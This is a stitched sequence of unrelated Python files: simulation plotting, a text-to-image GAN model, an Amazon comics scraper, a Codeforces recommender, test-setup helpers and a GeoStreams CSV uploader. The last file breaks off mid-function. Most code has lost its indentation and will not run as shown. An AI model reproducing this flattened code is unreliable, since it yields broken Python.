numUnCommited = np.zeros(actualMaxTime)
numCommited = np.zeros(actualMaxTime)
timeVector = list(range(actualMaxTime))
closedEvents = np.zeros(actualMaxTime)
openedEvents = np.zeros(actualMaxTime)
canceledEvents= np.zeros(actualMaxTime)
allEvents = np.zeros(actualMaxTime)
for i,st in enumerate(p):
numUnCommited[i] = len(list(st.events.getUnCommitedKeys()))
numCommited[i] = len(list(st.events.getCommitedKeys()))
for iE in range(numEvents):
eventTemp = st.events.getObject(iE)
if eventTemp.status == Status.CANCELED:
canceledEvents[i] += 1
elif eventTemp.status == Status.CLOSED:
closedEvents[i] += 1
elif eventTemp.status == Status.OPENED:
openedEvents[i] += 1
allEvents[i] = canceledEvents[i]+closedEvents[i]+openedEvents[i]
# dump logs
with open( 'MyAStarResult_' + str(1) + 'weight_' + str(numCars) + 'numCars_' + str(numEvents) + 'numEvents_' + str(gridSize) + 'gridSize.p', 'wb') as out:
pickle.dump({'runTime': runTime,
'time': timeVector,
'OpenedEvents' : openedEvents,
'closedEvents' : closedEvents,
'canceledEvents': canceledEvents,
'allEvents' : allEvents, 'cost': p[-1].gval}, out)
imageList = []
for s in p:
imageList.append(plotForGif(s, numEvents,numCars, gridSize))
imageio.mimsave('./gif_AStarSolution_' + str(gridSize) + 'grid_' + str(numCars) + 'cars_' + str(numEvents) + 'events_' + str(deltaOpenTime) + 'eventsTw_' + str(maxTime) + 'maxTime.gif', imageList, fps=1)
def plotForGif(s, ne,nc, gs):
"""
plot cars as red points, events as blue points,
and lines connecting cars to their targets
:param carDict:
:param eventDict:
:return: image for gif
"""
fig, ax = plt.subplots()
ax.set_title('time: {0}'.format(s.time))
for c in range(nc):
carTemp = s.cars.getObject(c)
ax.scatter(carTemp.position[0], carTemp.position[1], c='k', alpha=0.5)
ax.scatter([], [], c='b', marker='*', label='Opened not commited')
ax.scatter([], [], c='b', label='Opened commited')
ax.scatter([], [], c='r', label='Canceled')
ax.scatter([], [], c='g', label='Closed')
for i in range(ne):
eventTemp = s.events.getObject(i)
if eventTemp.status == Status.OPENED and eventTemp.commited:
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='b', alpha=0.7)
elif eventTemp.status == Status.OPENED and eventTemp.commited == False:
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='b', marker='*', alpha=0.7)
elif (eventTemp.status == Status.CLOSED):
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='g', alpha=0.2)
elif (eventTemp.status == Status.CANCELED):
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='r', alpha=0.2)
else:
ax.scatter(eventTemp.position[0], eventTemp.position[1], c='y', alpha=0.2)
ax.set_xlim([-1, gs + 1])
ax.set_ylim([-1, gs + 1])
ax.grid(True)
plt.legend()
    # Used to return the plot as an image array
fig.canvas.draw() # draw the canvas, cache the renderer
image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
return image
if __name__ == '__main__':
main()
print('Done.')
|
import torch
import torch.nn as nn
from DAMSM import ImageEncoder, TextEncoder, BertEncoder
from modules.models import (
Discriminator64,
Discriminator128,
Discriminator256,
Generator
)
from utils import init_weight, freeze_model
class Text2ImgModel(nn.Module):
def __init__(
self,
embedding_dim,
n_tokens,
text_encoder_embd_size,
pretrained_text_encoder_path,
pretrained_image_encoder_path,
pretrained_generator_path,
branch_num,
num_generator_filters,
num_discriminator_filters,
z_dim,
condition_dim,
is_bert_encoder,
use_sagan,
base_size,
device
):
super(Text2ImgModel, self).__init__()
self.z_dim = z_dim
self.is_bert_encoder = is_bert_encoder
self.image_encoder = ImageEncoder(
multimodal_feat_size=embedding_dim
).to(device)
if pretrained_image_encoder_path != '':
state_dict = torch.load(
pretrained_image_encoder_path,
map_location=lambda storage, loc: storage
)
self.image_encoder.load_state_dict(state_dict)
print('Load image encoder from:', pretrained_image_encoder_path)
else:
print('Warning: no pretrained image encoder')
for p in self.image_encoder.parameters():
p.requires_grad = False
self.image_encoder.eval()
if self.is_bert_encoder:
self.text_encoder = BertEncoder(emb_size=embedding_dim).to(device)
else:
self.text_encoder = TextEncoder(
n_tokens=n_tokens, text_feat_size=embedding_dim,
emb_size=text_encoder_embd_size
).to(device)
if pretrained_text_encoder_path != '':
state_dict = \
torch.load(pretrained_text_encoder_path,
map_location=lambda storage, loc: storage)
self.text_encoder.load_state_dict(state_dict)
print('Load text encoder from:', pretrained_text_encoder_path)
else:
print('Warning: no pretrained text encoder')
for p in self.text_encoder.parameters():
p.requires_grad = False
self.text_encoder.eval()
self.generator = Generator(
ngf=num_generator_filters,
emb_dim=embedding_dim,
ncf=condition_dim,
branch_num=branch_num,
device=device,
z_dim=z_dim,
is_sagan=use_sagan,
base_size=base_size,
).to(device)
self.discriminators = []
if branch_num > 0:
self.discriminators.append(Discriminator64(
dim=num_discriminator_filters,
embd_dim=embedding_dim,
is_spectral=use_sagan,
base_size=base_size,
).to(device))
if branch_num > 1:
self.discriminators.append(Discriminator128(
ndf=num_discriminator_filters,
embd_dim=embedding_dim,
is_spectral=use_sagan,
base_size=base_size,
).to(device))
if branch_num > 2:
self.discriminators.append(Discriminator256(
ndf=num_discriminator_filters,
embd_dim=embedding_dim,
is_spectral=use_sagan,
base_size=base_size,
).to(device))
self.generator.apply(init_weight)
for i in range(len(self.discriminators)):
self.discriminators[i].apply(init_weight)
if pretrained_generator_path != '':
state_dict = torch.load(
pretrained_generator_path,
map_location=lambda storage, loc: storage
)
self.generator.load_state_dict(state_dict)
print('Load generator from: ', pretrained_generator_path)
def forward(self, captions, cap_lens, noise, masks):
if not self.is_bert_encoder:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens)
else:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens, masks)
mask = (captions == 0)
num_words = words_embeddings.size(2)
if mask.size(1) > num_words:
mask = mask[:, :num_words]
fake_images, attention_maps, mu, logvar = self.generator(
noise,
sentence_embedding,
words_embeddings,
mask
)
return fake_images, mu, logvar, sentence_embedding, words_embeddings
def save_model_ckpt(self, epoch, path):
torch.save({
'epoch': epoch,
'img_enc': self.image_encoder.state_dict(),
'txt_enc': self.text_encoder.state_dict(),
'discriminator': [d.state_dict() for d in self.discriminators],
'generator': self.generator.state_dict()
}, path)
def load_model_ckpt(self, path):
# Load
weights = torch.load(path)
self.image_encoder.load_state_dict(weights['img_enc'])
self.text_encoder.load_state_dict(weights['txt_enc'])
# Freeze parameters
freeze_model(self.image_encoder)
freeze_model(self.text_encoder)
self.image_encoder.eval()
self.text_encoder.eval()
for i, d in enumerate(self.discriminators):
d.load_state_dict(weights['discriminator'][i])
self.generator.load_state_dict(weights['generator'])
return weights['epoch']
class Text2ImgEvalModel(nn.Module):
def __init__(
self,
embedding_dim,
n_tokens,
text_encoder_embd_size,
branch_num,
num_generator_filters,
z_dim,
condition_dim,
is_bert_encoder,
use_sagan,
base_size,
device,
pretrained_ckpt=None,
pretrained_text_encoder_path=None,
pretrained_generator_path=None
):
super(Text2ImgEvalModel, self).__init__()
self.z_dim = z_dim
self.is_bert_encoder = is_bert_encoder
if self.is_bert_encoder:
self.text_encoder = BertEncoder(emb_size=embedding_dim).to(device)
else:
self.text_encoder = TextEncoder(
n_tokens=n_tokens, text_feat_size=embedding_dim,
emb_size=text_encoder_embd_size
).to(device)
self.generator = Generator(
ngf=num_generator_filters,
emb_dim=embedding_dim,
ncf=condition_dim,
branch_num=branch_num,
device=device,
z_dim=z_dim,
is_sagan=use_sagan,
base_size=base_size,
).to(device)
self.load_model(
pretrained_ckpt,
pretrained_text_encoder_path,
pretrained_generator_path
)
def forward(self, captions, cap_lens, noise, masks):
if not self.is_bert_encoder:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens)
else:
words_embeddings, sentence_embedding = \
self.text_encoder(captions, cap_lens, masks)
mask = (captions == 0)
num_words = words_embeddings.size(2)
if mask.size(1) > num_words:
mask = mask[:, :num_words]
fake_images, attention_maps, mu, logvar = self.generator(
noise,
sentence_embedding,
words_embeddings,
mask
)
return fake_images, mu, logvar, sentence_embedding, words_embeddings
def load_model(self, ckpt, text_enc, gen):
if ckpt is None and text_enc is None and gen is None:
raise FileNotFoundError("Set path to load the model")
if ckpt is not None and (text_enc is not None or gen is not None):
raise ValueError(
"Specify just one way for loading:"
"checkpoint path or two separate files"
"for text encoder and generator"
)
if ckpt is not None:
print('Loading from checkpoint')
weights = torch.load(ckpt)
self.text_encoder.load_state_dict(weights['txt_enc'])
self.generator.load_state_dict(weights['generator'])
elif gen is not None and text_enc is not None:
print('Loading from separate files')
self.text_encoder.load_state_dict(torch.load(text_enc))
self.generator.load_state_dict(torch.load(gen))
elif gen is None or text_enc is None:
raise FileNotFoundError(
"Specify both generator and text encoder files"
)
self.eval()
freeze_model(self)
if __name__ == '__main__':
DEV = torch.device('cpu')
model = Text2ImgModel(
embedding_dim=256,
n_tokens=20,
text_encoder_embd_size=128,
pretrained_text_encoder_path='',
pretrained_image_encoder_path='',
pretrained_generator_path='',
branch_num=3,
num_generator_filters=32,
num_discriminator_filters=64,
z_dim=100,
condition_dim=128,
is_bert_encoder=False,
base_size=32,
device=DEV,
use_sagan=True
)
print(model)
|
"""
You must run create_db.py beforehand to create the DB file.
Scrapes every page of the Amazon Kindle Unlimited comics search
results and saves the data into an SQLite3 database.
"""
import os
import sqlite3
import sys
import traceback
from contextlib import closing
from time import sleep
from retry import retry
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import TimeoutException
from selenium.webdriver import Chrome, ChromeOptions
db_name = 'database.db'
if not (os.path.exists(db_name)):
    sys.exit('Run create_db.py first')
# Temporarily add the driver directory to the PATH
delimiter = ';' if os.name == 'nt' else ':'
os.environ['PATH'] += (delimiter + os.path.abspath('driver'))
options = ChromeOptions()
options.add_argument('--headless')
driver = Chrome(options=options)
driver.set_window_size(10240, 10240)
page_counter = 0
@retry(TimeoutException, tries=4, delay=5, backoff=2)
def get_next_page(driver, next_page_link):
driver.get(next_page_link.get_attribute('href'))
try:
    # Access the comics top page
driver.get('https://www.amazon.co.jp/s/?rh=n%3A3201084051&ref_=msw_list_shoveler_KU_mangatop_title')
with closing(sqlite3.connect(db_name)) as conn:
c = conn.cursor()
c.execute('delete from comics')
insert_sql = '''insert into comics (
thumbnail,
book_name,
book_url,
release_date,
author_name) values (?, ?, ?, ?, ?)'''
while True:
page_counter += 1
            print('Started processing page ' + str(page_counter) + '.')
books = driver.find_elements_by_xpath(
'//*[@id="search"]//div[@class="s-include-content-margin s-border-bottom"]')
comics = []
            # Process each book on this page
for book in books:
                # Get the thumbnail
thumbnail = book.find_element_by_xpath('.//a/div/img[@class="s-image"]').get_attribute('src')
                # Get the book details
title_box = book.find_element_by_xpath('.//h2/a')
book_name = title_box.text.strip()
book_url = title_box.get_attribute('href')
release_date = ''
try:
release_date = book.find_element_by_xpath(
'.//span[@class="a-size-base a-color-secondary a-text-normal"]').text
except NoSuchElementException:
pass
author_name = ''
try:
author_name = \
book.find_element_by_xpath('.//div[@class="a-row a-size-base a-color-secondary"]').text.split(
'|')[
0]
except NoSuchElementException:
pass
                # Build the SQL parameters
comics.append((thumbnail, book_name, book_url, release_date, author_name))
            # Insert all rows for this page at once
c.executemany(insert_sql, comics)
conn.commit()
try:
next_page_link = driver.find_element_by_xpath(
'//*[@id="search"]//ul[@class="a-pagination"]//li[@class="a-last"]/a')
sleep(2)
get_next_page(driver, next_page_link)
if (page_counter % 100) == 0:
                    print('Taking a short break')
sleep(30)
except NoSuchElementException:
                print('Page ' + str(page_counter) + ' appears to be the last page. Finishing.')
break
except:
traceback.print_exc()
finally:
driver.quit()
|
#
# inventory/regions/apps.py
#
"""
Regions App data
"""
__docformat__ = "restructuredtext en"
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class RegionsConfig(AppConfig):
name = 'inventory.regions'
label = 'regions'
verbose_name = _("Regions")
|
import urllib
from urllib.request import urlopen as Ureq, Request
import json
import time
import random
hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}
def get_json(url):
req = Request(url, headers=hdr)
page = Ureq(req)
try:
js = page.read().decode()
js = json.loads(js)
except:
js = None
return js
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
user_solve = set()
def get_user_solve(username):
url = "https://codeforces.com/api/user.status?handle=" + username
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return
for submission in js["result"]:
if submission["verdict"] == "OK":
user_solve.add(str(submission["problem"]["contestId"])+submission["problem"]["index"])
contest_list = set()
def get_contest_list():
url = "https://codeforces.com/api/contest.list"
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return
for contest in js["result"]:
name = contest["name"]
if "Div" in name:
contest_list.add(contest["id"])
def get_user_rating(username):
url = "https://codeforces.com/api/user.info?handles=" + username
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return 600
js = js["result"][0]
try:
return js["rating"];
except:
return 600
def not_taken(ls, tags):
mx = 0
for i in ls:
        cnt = 0
for j in i[2]:
if j in tags:
cnt += 1
try:
            per = (cnt / len(i[2])) * 100
except:
return False
mx = max(mx, per)
if mx > 80 and len(tags) == 0:
return False
return True
def recommender(username):
username = username.split()
user_rating = get_user_rating(username[0])
if user_rating is None:
return []
user_rating = int(user_rating / 100)
user_rating = int(user_rating * 100)
for user in username:
get_user_solve(user)
get_contest_list()
url = "https://codeforces.com/api/problemset.problems"
js = get_json(url)
if not js or "status" not in js or js["status"] != "OK":
return []
ret = list()
prob_a = 0
prob_b = 0
prob_c = 0
js = js["result"]["problems"]
random.shuffle(js)
for problem in js:
link = "https://codeforces.com/contest/" + str(problem["contestId"]) + "/problem/" + problem["index"]
name = problem["name"]
try:
rating = problem["rating"]
except:
continue
tags = problem["tags"]
contest_id = problem["contestId"]
prob_id = str(problem["contestId"]) + problem["index"]
if prob_id not in user_solve and contest_id in contest_list:
if rating == user_rating+100 and prob_a < 2:
if not_taken(ret, tags):
ret.append([link, name, tags, rating])
prob_a += 1
elif rating == user_rating+200 and prob_b < 2:
if not_taken(ret, tags):
ret.append([link, name, tags, rating])
prob_b += 1
elif rating == user_rating+300 and prob_c < 6:
if not_taken(ret, tags):
ret.append([link, name, tags, rating])
prob_c += 1
if len(ret) >= 10:
return ret;
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
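# Usage sketch (the handle below is a placeholder, and a network connection to the
# Codeforces API is assumed): recommender() returns up to 10 unsolved problems from
# Div. contests rated 100-300 points above the user's rating, each as
# [link, name, tags, rating], or None if fewer than 10 matches are found.
if __name__ == "__main__":
    for problem in recommender("your_handle") or []:
        print(problem[3], problem[1], problem[0])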
|
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test setup helpers for non-doctests.
"""
import unittest
import re
from martian.scan import module_info_from_dotted_name
from z3c.testsetup.base import BasicTestSetup
from z3c.testsetup.util import (get_package, get_marker_from_string,
get_marker_from_file)
class UnitTestSetup(BasicTestSetup):
"""A unit test setup for packages.
A collection of methods to search for appropriate modules in
a given package. ``UnitTestSetup`` is also able to 'register' the
tests found and to deliver them as a ready-to-use
``unittest.TestSuite`` instance.
While the functionality to search for testfiles is mostly
inherited from the base class, the focus here is to setup the
tests correctly.
See file `unittestsetup.py` in the tests/testsetup directory to
learn more about ``UnitTestSetup``.
"""
regexp_list = [
r'^\.{0,2}\s*:(T|t)est-(L|l)ayer:\s*(python)\s*',
]
def __init__(self, package, pfilter_func=None, regexp_list=None):
BasicTestSetup.__init__(self, package, regexp_list=regexp_list)
self.pfilter_func = pfilter_func or self.isTestModule
self.filter_func = self.pfilter_func
def docstrContains(self, docstr):
"""Does a docstring contain lines matching every of the regular
expressions?
"""
found_list = []
if docstr is None:
return False
if get_marker_from_string('unittest', docstr) is not None:
return True
return self.textContains(docstr)
def isTestModule(self, module_info):
"""Return ``True`` if a module matches our expectations for a
test file.
        This is the case if it has a module docstring which matches
each of our regular expressions.
"""
# Do not even try to load modules, that have no marker string.
if not self.fileContains(module_info.path):
# No ":test-layer: python" marker, so check for :unittest:.
if get_marker_from_file('unittest', module_info.path) is None:
# Neither the old nor the new marker: this is no test module.
return False
module = None
try:
module = module_info.getModule()
except ImportError:
# Broken module that is probably a test. We absolutely have to
# warn about this!
print("Import error in %s" % module_info.path)
docstr = getattr(module, '__doc__', '')
if not self.docstrContains(docstr):
return False
return True
def getModules(self, package=None):
result = []
if package is None:
package = self.package
info = module_info_from_dotted_name(package.__name__)
for submod_info in info.getSubModuleInfos():
if submod_info.isPackage():
result.extend(self.getModules(submod_info.getModule()))
continue
if not self.pfilter_func(submod_info):
continue
module = submod_info.getModule()
result.append(module)
return result
def getTestSuite(self):
modules = self.getModules(package=self.package)
suite = unittest.TestSuite()
for module in modules:
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
suite.addTest(tests)
return suite
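# Usage sketch (``my.package`` is a hypothetical package): collect the unit test
# modules of a package that carry the ``:unittest:`` marker (or the legacy
# ``:Test-Layer: python`` marker) and run them.
#   import my.package
#   suite = UnitTestSetup(my.package).getTestSuite()
#   unittest.TextTestRunner().run(suite)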
|
from datetime import datetime
class GoveeError(Exception):
pass
class APIError(GoveeError):
pass
class AuthError(APIError):
pass
class DevicesError(APIError):
pass
class RatelimitError(APIError):
def __init__(self, msg: str, time: int):
self.message = msg
self.time = datetime.fromtimestamp(time)
def __str__(self): return self.message
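# Minimal sketch (values are illustrative): ``time`` is expected to be a Unix
# timestamp, which the constructor converts to a ``datetime`` for convenience.
if __name__ == '__main__':
    err = RatelimitError("Rate limit exceeded", 1609459200)
    print(err, "- retry allowed after", err.time.isoformat())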
|
"""Loads CSV files into GeoStreams
"""
import argparse
import csv
import datetime
import json
import logging
import os
from typing import Optional, Union
from urllib.parse import urlparse
import requests
from terrautils.betydb import get_sites_by_latlon
from terrautils.spatial import wkt_to_geojson
import configuration
import transformer_class
# Clowder and GeoStreams related definitions
CLOWDER_DEFAULT_URL = os.environ.get('CLOWDER_URL', 'https://terraref.ncsa.illinois.edu/clowder/')
CLOWDER_DEFAULT_KEY = os.environ.get('CLOWDER_KEY', '')
GEOSTREAMS_API_URL_PARTICLE = 'api/geostreams'
GEOSTREAMS_CSV_SENSOR_TYPE = 4
class __internal__():
"""Class for functions intended for internal use only for this file
"""
def __init__(self):
"""Performs initialization of class instance
"""
@staticmethod
def get_geostreams_api_url(base_url: str, url_particles: Union[str, tuple, None]) -> str:
"""Returns the URL constructed from parameters
Arguments:
base_url: the base URL (assumes scheme:[//authority] with optional path)
url_particles: additional strings to append to the end of the base url
Return:
Returns the formatted URL (guaranteed to not have a trailing slash)
"""
def url_join(base_url: str, url_parts: tuple) -> str:
"""Internal function to create URLs in a consistent fashion
Arguments:
base_url: the starting part of the URL
url_parts: the parts of the URL to join
Return:
The formatted URL
"""
built_url = ''
base_parse = urlparse(base_url)
if base_parse.scheme:
built_url = base_parse.scheme + '://'
if base_parse.netloc:
built_url += base_parse.netloc + '/'
if base_parse.path and not base_parse.path == '/':
built_url += base_parse.path.lstrip('/') + '/'
joined_parts = '/'.join(url_parts).replace('//', '/').strip('/')
return built_url + joined_parts
if not url_particles:
            return url_join(base_url, (GEOSTREAMS_API_URL_PARTICLE,))
if isinstance(url_particles, str):
return url_join(base_url, (GEOSTREAMS_API_URL_PARTICLE, url_particles))
formatted_particles = tuple(str(part) for part in url_particles)
        return url_join(base_url, (GEOSTREAMS_API_URL_PARTICLE,) + formatted_particles)
@staticmethod
def _common_geostreams_name_get(clowder_url: str, clowder_key: str, url_endpoint: str, name_query_key: str, name: str) -> \
Optional[dict]:
"""Common function for retrieving data from GeoStreams by name
Arguments:
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
url_endpoint: the endpoint to query (URL particle appended to the base URL, eg: 'streams')
name_query_key: the name of the query portion of URL identifying the name to search on (eg: 'stream_name')
name: the name to search on
Return:
Returns the found information, or None if not found
"""
url = __internal__.get_geostreams_api_url(clowder_url, url_endpoint)
params = {name_query_key: name}
if clowder_key:
params['key'] = clowder_key
logging.debug("Calling geostreams url '%s' with params '%s'", url, str(params))
resp = requests.get(url, params)
resp.raise_for_status()
for one_item in resp.json():
if 'name' in one_item and one_item['name'] == name:
logging.debug("Found %s '%s' = [%s]", name_query_key, name, one_item['id'])
return one_item
return None
@staticmethod
def common_geostreams_create(clowder_url: str, clowder_key: str, url_endpoint: str, request_body: str) -> Optional[str]:
"""Common function for creating an object in GeoStreams
Arguments:
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
url_endpoint: the endpoint to query (URL particle appended to the base URL, eg: 'streams')
request_body: the body of the request
Return:
Returns the ID of the created object or None if no ID was returned
"""
url = __internal__.get_geostreams_api_url(clowder_url, url_endpoint)
if clowder_key:
url = url + '?key=' + clowder_key
result = requests.post(url,
headers={'Content-type': 'application/json'},
data=request_body)
result.raise_for_status()
result_id = None
result_json = result.json()
if isinstance(result_json, dict) and 'id' in result_json:
result_id = result_json['id']
logging.debug("Created GeoStreams %s: id = '%s'", url_endpoint, result_id)
else:
logging.debug("Call to GeoStreams create %s returned no ID", url_endpoint)
return result_id
@staticmethod
def get_sensor_by_name(sensor_name: str, clowder_url: str, clowder_key: str) -> Optional[dict]:
"""Returns the GeoStreams sensor information retrieved from Clowder
Arguments:
sensor_name: the name of the data sensor to retrieve
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
Return:
Returns the information on the sensor or None if the stream can't be found
"""
return __internal__._common_geostreams_name_get(clowder_url, clowder_key, 'sensors', 'sensor_name', sensor_name)
@staticmethod
def get_stream_by_name(stream_name: str, clowder_url: str, clowder_key: str) -> Optional[dict]:
"""Returns the GeoStreams stream information retrieved from Clowder
Arguments:
stream_name: the name of the data stream to retrieve
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
Return:
Returns the information on the stream or None if the stream can't be found
"""
return __internal__._common_geostreams_name_get(clowder_url, clowder_key, 'streams', 'stream_name', stream_name)
@staticmethod
def create_sensor(sensor_name: str, clowder_url: str, clowder_key: str, geom: dict, sensor_type: dict, region: str) -> str:
"""Create a new sensor in Geostreams.
Arguments:
sensor_name: name of new sensor to create
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
geom: GeoJSON object of sensor geometry
sensor_type: JSON object with {"id", "title", and "sensorType"}
region: region of sensor
"""
body = {
"name": sensor_name,
"type": "Point",
"geometry": geom,
"properties": {
"popupContent": sensor_name,
"type": sensor_type,
"name": sensor_name,
"region": region
}
}
return __internal__.common_geostreams_create(clowder_url, clowder_key, 'sensors', json.dumps(body))
@staticmethod
def create_stream(stream_name: str, clowder_url: str, clowder_key: str, sensor_id: str, geom: dict, properties=None) -> str:
"""Create the indicated GeoStream
Arguments:
stream_name: the name of the data stream to retrieve
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
sensor_id: the ID of the sensor associated with the stream
geom: the geometry of the stream to create
properties: additional properties for the stream
Return:
The ID of the created stream
"""
body = {
"name": stream_name,
"type": "Feature",
"geometry": geom,
"properties": {} if not properties else properties,
"sensor_id": str(sensor_id)
}
return __internal__.common_geostreams_create(clowder_url, clowder_key, 'streams', json.dumps(body))
@staticmethod
def create_data_points(clowder_url: str, clowder_key: str, stream_id: str, data_point_list: list) -> None:
"""Uploads the data points to GeoStreams
Arguments:
clowder_url: the URL of the Clowder instance to access
clowder_key: the key to use when accessing Clowder (can be None or '')
stream_id: the ID of the stream to upload to
data_point_list: the list of data points to upload
"""
body = {
"datapoints": data_point_list,
"stream_id": str(stream_id)
}
__internal__.common_geostreams_create(clowder_url, clowder_key, 'datapoints/bulk', json.dumps(body))
@staticmethod
def get_matched_sites(clowder_url: str, clowder_key: str, plot_name: str, lat_lon: tuple, filter_date: str) -> dict:
"""Returns sensor metadata matching the plot
Arguments:
clowder_url: the URL of the Clowder instance to load the file to
clowder_key: the key to use when accessing Clowder
plot_name: name of plot to map data point into if possible, otherwise query BETY
lat_lon: [latitude, longitude] tuple of data point location
filter_date: date used to restrict number of sites returned from BETYdb
Return:
Returns the sites matching the plot and date. An empty dict may be returned
"""
# SENSOR is the plot
matched_sites = {}
if plot_name:
# If provided a plot name, see if the sensor exists before going into more expensive logic
sensor_data = __internal__.get_sensor_by_name(plot_name, clowder_url, clowder_key)
if sensor_data:
matched_sites[sensor_data['id']] = {
"name": plot_name,
"geom": sensor_data['geometry']
}
if not matched_sites:
# If we don't have existing sensor to use quickly, we must query geographically
site_list = get_sites_by_latlon(lat_lon, filter_date)
for one_site in site_list:
plot_name = one_site['sitename']
plot_geom = json.loads(wkt_to_geojson(one_site['geometry']))
# Get existing sensor with this plot name from geostreams, or create if it doesn't exist
sensor_data = __internal__.get_sensor_by_name(plot_name, clowder_url, clowder_key)
if not sensor_data:
sensor_id = __internal__.create_sensor(plot_name, clowder_url, clowder_key, plot_geom,
{
"id": "MAC Field Scanner",
"title": "MAC Field Scanner",
"sensorType": GEOSTREAMS_CSV_SENSOR_TYPE
},
"Maricopa")
matched_sites[sensor_id] = {"name": plot_name, "geom": plot_geom}
else:
sensor_id = sensor_data['id']
matched_sites[sensor_id] = {"name": plot_name, "geom": plot_geom}
return matched_sites
@staticmethod
def create_datapoint(clowder_url: str, clowder_key: str, stream_id: str, geom: dict, start_time: str, end_time: str,
properties: dict = None) -> str:
"""Create a new data point in Geostreams
Arguments:
clowder_url: the URL of the Clowder instance to load the file to
clowder_key: the key to use when accessing Clowder
stream_id: id of stream to attach data point to
geom: GeoJSON object of sensor geometry
start_time: start time, in format 2017-01-25T09:33:02-06:00
end_time: end time, in format 2017-01-25T09:33:02-06:00
properties: JSON object with any desired properties
Return:
The ID of the created data point
"""
body = {
"start_time": start_time,
"end_time": end_time,
"type": "Point",
"geometry": geom,
"properties": properties,
"stream_id": str(stream_id)
}
return __internal__.common_geostreams_create(clowder_url, clowder_key, 'datapoints', json.dumps(body))
@staticmethod
def create_datapoint_with_dependencies(clowder_traits_url: str, clowder_key: str, stream_prefix: str, lat_lon: tuple,
start_time: str, end_time: str, metadata: dict = None, filter_date: str = '',
geom: dict = None, plot_name: str = None) -> None:
""" Submit traits CSV file to Clowder
Arguments:
clowder_traits_url: the URL of the Clowder instance to load the file to
clowder_key: the key to use when accessing Clowder
stream_prefix: prefix of stream to attach data point to
lat_lon: [latitude, longitude] tuple of data point location
start_time: start time, in format 2017-01-25T09:33:02-06:00
end_time: end time, in format 2017-01-25T09:33:02-06:00
metadata: JSON object with any desired properties
filter_date: date used to restrict number of sites returned from BETYdb
geom: geometry for data point (use plot if not provided)
plot_name: name of plot to map data point into if possible, otherwise query BETY
Exceptions:
Raises RuntimeError exception if a Clowder URL is not specified
"""
matched_sites = __internal__.get_matched_sites(clowder_traits_url, clowder_key, plot_name, lat_lon, filter_date)
for sensor_id in matched_sites:
plot_geom = matched_sites[sensor_id]["geom"]
stream_name = "%s (%s)" % (stream_prefix, sensor_id)
stream_data = __internal__.get_stream_by_name(stream_name, clowder_traits_url, clowder_key)
if not stream_data:
stream_id = __internal__.create_stream(stream_name, clowder_traits_url, clowder_key, sensor_id, plot_geom)
else:
stream_id = stream_data['id']
logging.info("Posting datapoint to stream %s", stream_id)
if not geom:
geom = plot_geom
__internal__.create_datapoint(clowder_traits_url, clowder_key, stream_id, geom, start_time, end_time, metadata)
def add_parameters(parser: argparse.ArgumentParser) -> None:
"""Adds parameters
Arguments:
parser: instance of argparse.ArgumentParser
"""
parser.add_argument('--clowder_url', default=CLOWDER_DEFAULT_URL,
help="the url of the Clowder instance to access for GeoStreams (default '%s')" % CLOWDER_DEFAULT_URL)
parser.add_argument('--clowder_key', default=CLOWDER_DEFAULT_KEY,
help="the key to use when accessing Clowder %s" %
("(default: using environment value)" if CLOWDER_DEFAULT_KEY else ''))
# Here we specify a default metadata file that we provide to get around the requirement while also allowing
# pylint: disable=protected-access
for action in parser._actions:
if action.dest == 'metadata' and not action.default:
action.default = ['/home/extractor/default_metadata.json']
break
def check_continue(transformer: transformer_class.Transformer, check_md: dict) -> tuple:
"""Checks if conditions are right for continuing processing
Arguments:
transformer: instance of transformer class
check_md: request specific metadata
Return:
Returns a tuple containing the return code for continuing or not, and
an error message if there's an error
"""
# pylint: disable=unused-argument
for one_file in check_md['list_files']():
if os.path.splitext(one_file)[1].lower() == '.csv':
return tuple([0])
return -1, "Unable to find a CSV file in the list of files"
def perform_process(transformer: transformer_class.Transformer, check_md: dict) -> dict:
"""Performs the processing of the data
Arguments:
transformer: instance of transformer class
check_md: request specific metadata
Return:
Returns a dictionary with the results of processing
"""
# Process each CSV file into BETYdb
start_timestamp = datetime.datetime.now()
files_count = 0
files_csv = 0
lines_read = 0
error_count = 0
files_loaded = []
for one_file in check_md['list_files']():
files_count += 1
if os.path.splitext(one_file)[1].lower() == '.csv':
files_csv += 1
# Make sure we can access the file
if not os.path.exists(one_file):
msg = "Unable to access csv file '%s'" % one_file
logging.debug(msg)
